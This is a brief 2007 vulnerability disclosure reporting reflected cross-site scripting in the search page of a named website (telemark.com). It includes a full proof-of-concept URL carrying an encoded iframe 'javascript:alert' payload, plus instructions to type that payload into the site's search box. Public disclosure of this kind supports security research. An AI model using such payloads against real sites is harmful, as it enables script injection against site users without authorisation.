
telemark-xss.txt

Posted on 31 August 2007

# Title : Telemark XSS
# Description : The Telemark (telemark.com) search engine is vulnerable to XSS
# Author : Tosser
# E-mail : ht7015@gmail.com
# Proof : http://telemark.com/results-b.jsp?searchTerm=%3Ciframe+src%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E%3C%2Fiframe%3E&x=51&y=11&domainName=telemark.com&w=false&afdt=In51F73BbzMKEwiLy6KLpZ6OAhUJGRoKHfV_kdQYAyAAMNmNlQ84DQ&searchbox=y
# or go to telemark.com and type "<iframe src="javascript:alert('XSS')"></iframe>" in the search box.

 
